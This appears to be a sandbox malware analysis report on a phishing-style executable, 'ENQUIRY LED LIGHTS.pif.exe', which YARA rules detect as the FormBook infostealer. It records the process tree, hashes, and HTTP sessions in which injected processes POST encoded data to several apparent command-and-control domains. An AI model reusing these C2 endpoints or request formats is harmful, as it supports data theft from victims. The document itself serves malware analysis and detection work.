                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.asklifeclarity.shop
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Content-Length: 203
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.asklifeclarity.shop
                                                                                                Referer: http://www.asklifeclarity.shop/b5w1/
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
                                                                                                Data Ascii: ZtyPTl=Wxg6DYjkEPuCkzxnCK7CNDI7Z6b66oJtrsugy44ueqxGIWUMuE4Igo62QGZwgTd2509fCiP5yOtp0E99p/kTTmWRMioXZ0X5YooZ3zYW7Iv5iWHmqu9kBSuaA+ZeZUg2k+NoaRQYBPafDnGWNOu549kPgc0SgZQEVrvxG06Zqa1/LxAmXBc98vZ1rHSZ+sWC7A==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 51329 | 75.2.103.23 | 80 | 2332 | C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 13:42:30.399317026 CET | 804 | OUT | POST /b5w1/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.asklifeclarity.shop
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Content-Length: 223
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.asklifeclarity.shop
                                                                                                Referer: http://www.asklifeclarity.shop/b5w1/
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
                                                                                                Data Ascii: ZtyPTl=Wxg6DYjkEPuClQpnHtXCYzI4Fqb6ooJTrsSgy5tjdYFGI2EMvAsIjo62amZ1jjdH50B9CmH5yO5p0BZ9oMcSS2WTHCoZUUX5YooZ33xB7MD5iFPmrKpleiuVB+ZedUgyk+NKaQMiBNSfDm2WN92mttkNkc1FrsoNUYGibUu7qb1mO3R8Gw9quv9G2AbtzvrLgCnF7HMBqyofwdAvs10MdMs=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 51345 | 75.2.103.23 | 80 | 2332 | C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 13:42:32.982907057 CET | 10886 | OUT | POST /b5w1/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.asklifeclarity.shop
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Content-Length: 10303
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.asklifeclarity.shop
                                                                                                Referer: http://www.asklifeclarity.shop/b5w1/
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
                                                                                                Data Ascii: ZtyPTl=Wxg6DYjkEPuClQpnHtXCYzI4Fqb6ooJTrsSgy5tjdY9GIk8MuiEIsI62WGZ0jjda50p5CmCCyNBp1nV9gdcSc2WTIioUZ0XJYoZQ3zVB7MD5iEfm9u9lNyuaA+ZSZUgKk+FwaQIyBcyfAGmWLeSmwdkDp81NrstVUYaubUaBqbBmPwdmC05j1O5l0B79rtX7hwTL9F9b5BAi6e1e4mYdB8sf0RH9HUHCjfl0EcUyLkfUhyBSxAmIYSNpHR/zYWJ5sSnAZAma9osKuE9I3A08LzPfVs01w5MNxa50Sn73fgxnLp9nF1vpczJOIr/lqSj1OAio7/CfgsVxz1ys/pqSobtwnnOjmJpbGoBZAuG5PMQg2VeXS5TObre2ldTkU9Cp/ckFpJXrYBsY2UTztHr5r0UDzt91+QbcdWTWkBtAK8sfqhzsc/e8PdGv0rSv8c/YTk5d3pt+2qCHdoy97kTllQl0tFnJw4zxa5JdGb/xgwuq+vuf57SrrNgC/eQE2ZgJjTq5g4Ne4u0CrVJCYowgar42mq6o9wnJTFaBedx6ic63CzR1XBSAf3X7OLiOUYGMeiCdPsM9fMPC9N+w+0vzjOdW4KvEeBVtx1nXcOe6morTi81Qe+jSfi8dyDAM8neCG1at0FMJv8x4gkjVFZokczxk47puTtGXdTcBzf7w7RbflwTCV1HIr5gFqdAC1iBYVGCIFUFM1iX/ddF8dJ1o4PpSKz8SIHvyccqFzZ1sN7cnU2dpCk+7KS0WJNzbCCuoMETqW2rdDqMb7MGlL7Ly130pdU7PgPW5UsApsy+d450FJq4jSIop4l6IgT36ynan0I6ycPF7hwIY9aNtWo7HvQV1jQkQZJNlgPkyDFkcsPcEwM88RHW8+hTsJgUZONeoCGb4GG+AYhkLvyAPGhpCYcbzF1JVnMQbpwHpfkiNSOoMd1uoyO7BaylVagV6eOTpbGLsuGHpAjMehF0NouuFNwUsnb1f8Lx+qwAG2IAhEwMhc [TRUNCATED]


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                4 | 192.168.2.4 | 51358 | 75.2.103.23 | 80 | 2332 | C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 6, 2024 13:42:35.552815914 CET | 507 | OUT | GET /b5w1/?ZtyPTl=bzIaAv/CNdT8rB9nL5XCeS9pdKyCtoE63OuxqOgiGohGR0wxghAT+4/hTXFB6xdR1WxfOWCw15kwsG97q/hVWyGWfRtZYXTzGedSrFAZ3YSj/Eq6qe9iIhY=&ZbwL=jPj4WxVP-Pg HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.asklifeclarity.shop
                                                                                                Connection: close
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
                                                                                                Nov 6, 2024 13:42:36.168476105 CET | 399 | IN | HTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Wed, 06 Nov 2024 12:42:36 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 259
                                                                                                Connection: close
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZtyPTl=bzIaAv/CNdT8rB9nL5XCeS9pdKyCtoE63OuxqOgiGohGR0wxghAT+4/hTXFB6xdR1WxfOWCw15kwsG97q/hVWyGWfRtZYXTzGedSrFAZ3YSj/Eq6qe9iIhY=&ZbwL=jPj4WxVP-Pg"}</script></head></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                5 | 192.168.2.4 | 51427 | 172.67.163.171 | 80 | 2332 | C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 6, 2024 13:42:49.476861000 CET | 772 | OUT | POST /umew/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.waidzeitcz.shop
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Content-Length: 203
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.waidzeitcz.shop
                                                                                                Referer: http://www.waidzeitcz.shop/umew/
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
                                                                                                Data Ascii: ZtyPTl=dV72BySOmYh9bvcjtyYFg7rI3WFrZ6nfKpa68YOOEqKYctLZgk2dwy63+/q367YzJcsg9DDjRN9FM0JAKrUD/lpgsDgs/RucnQuFk9Ae64wsvk+z/j8KVkfZGGFwbMxNxwevv/NRj9c/D6wNYhpyo8j22+Uc6Z/IOfm8SLrq3g6mEtwmPpg3/zBEOMBvA4XJGA==


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                6 | 192.168.2.4 | 51428 | 172.67.163.171 | 80 | 2332 | C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 6, 2024 13:42:52.107367039 CET | 792 | OUT | POST /umew/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.waidzeitcz.shop
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Content-Length: 223
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.waidzeitcz.shop
                                                                                                Referer: http://www.waidzeitcz.shop/umew/
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
                                                                                                Data Ascii: ZtyPTl=dV72BySOmYh9bKUjrVMFo7rJrmFrTanbKom68c2eE8yYdMXZhnud3y63nPq2lLYtJcxV9DPjRMdFM2hANYMA51pY1TgugBucnQuFk9U467Asv0Oz+BUVcEfWOmFwfMxJxwf6v6U6j/k/D7ANYTBt9Mi95eUJ1LSiKNfGSIzQ8Cm5Frh8eYBgtzl3TLIbN7qAdIA+8hprGPe/8WKylDSWJEA=


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                7 | 192.168.2.4 | 51429 | 172.67.163.171 | 80 | 2332 | C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 6, 2024 13:42:54.765788078 CET | 10874 | OUT | POST /umew/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.waidzeitcz.shop
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Content-Length: 10303
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.waidzeitcz.shop
                                                                                                Referer: http://www.waidzeitcz.shop/umew/
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                8 | 192.168.2.4 | 51430 | 172.67.163.171 | 80 | 2332 | C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 6, 2024 13:42:57.333697081 CET | 503 | OUT | GET /umew/?ZtyPTl=QXTWCFaCrqsBcZ0jvGl1ttfHxXcpVNWda4HOn4zcEeaqQvbbnXannTD248WElJ9FFMtE83bbHMtecG5XDZ8D8EJV2R1Y4Xui2kuIw8EG0Z1Ay2DF3ANMa14=&ZbwL=jPj4WxVP-Pg HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.waidzeitcz.shop
                                                                                                Connection: close
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
                                                                                                Nov 6, 2024 13:42:59.693639040 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Wed, 06 Nov 2024 12:42:59 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Vary: Accept-Encoding
                                                                                                X-Powered-By: PHP/8.2.19
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                Link: <https://www.waidzeitcz.shop/wp-json/>; rel="https://api.w.org/"
                                                                                                cf-cache-status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DLF1EiCwzp0ip6TLXPZbsx%2FOX7C8UYiqG3GfV0vU5hz3fFNUDNMcl733jJu8e%2FuBmEnjfqgSJRDOBBV9Ou2UFrXWbeUoFad9dv%2Bb3V1ItCdFkrTfh3rNVMvgxHhRF4%2BCSyO1QPAZ"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8de52a9f998b4635-DFW
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1072&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=503&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                Data Ascii: 76a4<!DOCTYPE html><html lang="cs" prefix="og: https://ogp.me/ns#"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" c


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                9 | 192.168.2.4 | 51431 | 162.0.231.203 | 80 | 2332 | C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 6, 2024 13:43:05.430457115 CET | 778 | OUT | POST /uftp/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.windowmart.online
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Content-Length: 203
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.windowmart.online
                                                                                                Referer: http://www.windowmart.online/uftp/
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
Nov 6, 2024 13:43:06.089951038 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Wed, 06 Nov 2024 12:43:05 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 51432 | 162.0.231.203 | 80 | 2332 | C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 13:43:08.050035000 CET | 798 | OUT | POST /uftp/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.windowmart.online
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Content-Length: 223
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.windowmart.online
                                                                                                Referer: http://www.windowmart.online/uftp/
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
Nov 6, 2024 13:43:08.713653088 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Wed, 06 Nov 2024 12:43:08 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
11 | 192.168.2.4 | 51433 | 162.0.231.203 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 13:43:11.213046074 CET | 10880 | OUT | POST /uftp/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.windowmart.online
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Content-Length: 10303
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.windowmart.online
                                                                                                Referer: http://www.windowmart.online/uftp/
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
Nov 6, 2024 13:43:11.881344080 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Wed, 06 Nov 2024 12:43:11 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Target ID:0
                                                                                                Start time:07:41:01
                                                                                                Start date:06/11/2024
                                                                                                Path:C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe"
                                                                                                Imagebase:0x290000
                                                                                                File size:1'024'512 bytes
                                                                                                MD5 hash:120C54A53B6678586CC21F6EEFB3C3A5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:07:41:03
                                                                                                Start date:06/11/2024
                                                                                                Path:C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe"
                                                                                                Imagebase:0x3b0000
                                                                                                File size:1'024'512 bytes
                                                                                                MD5 hash:120C54A53B6678586CC21F6EEFB3C3A5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:07:41:03
                                                                                                Start date:06/11/2024
                                                                                                Path:C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe"
                                                                                                Imagebase:0xa60000
                                                                                                File size:1'024'512 bytes
                                                                                                MD5 hash:120C54A53B6678586CC21F6EEFB3C3A5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2071235910.0000000004630000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2071235910.0000000004630000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2069154376.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2069154376.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:7
                                                                                                Start time:07:41:29
                                                                                                Start date:06/11/2024
                                                                                                Path:C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe"
                                                                                                Imagebase:0x1a0000
                                                                                                File size:140'800 bytes
                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:8
                                                                                                Start time:07:41:32
                                                                                                Start date:06/11/2024
                                                                                                Path:C:\Windows\SysWOW64\SearchFilterHost.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\SysWOW64\SearchFilterHost.exe"
                                                                                                Imagebase:0x1a0000
                                                                                                File size:229'376 bytes
                                                                                                MD5 hash:1D221E674AC34BC114C91B8D56468315
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2977216188.0000000005040000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2977216188.0000000005040000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2977133044.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2977133044.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                Reputation:moderate
                                                                                                Has exited:false

                                                                                                Target ID:9
                                                                                                Start time:07:41:59
                                                                                                Start date:06/11/2024
                                                                                                Path:C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe"
                                                                                                Imagebase:0x1a0000
                                                                                                File size:140'800 bytes
                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2977288553.0000000002680000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2977288553.0000000002680000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:10
                                                                                                Start time:07:42:17
                                                                                                Start date:06/11/2024
                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                Imagebase:0x7ff6bf500000
                                                                                                File size:676'768 bytes
                                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true


                                                                                                  Execution Graph

                                                                                                  Execution Coverage:10.2%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:7%
                                                                                                  Total number of Nodes:114
                                                                                                  Total number of Limit Nodes:8

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Hxq$Hxq$Hxq$Hxq$Hxq
                                                                                                  • API String ID: 0-615405233

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00CED13E
                                                                                                  • GetCurrentThread.KERNEL32 ref: 00CED17B
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00CED1B8
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00CED211
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731621322.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
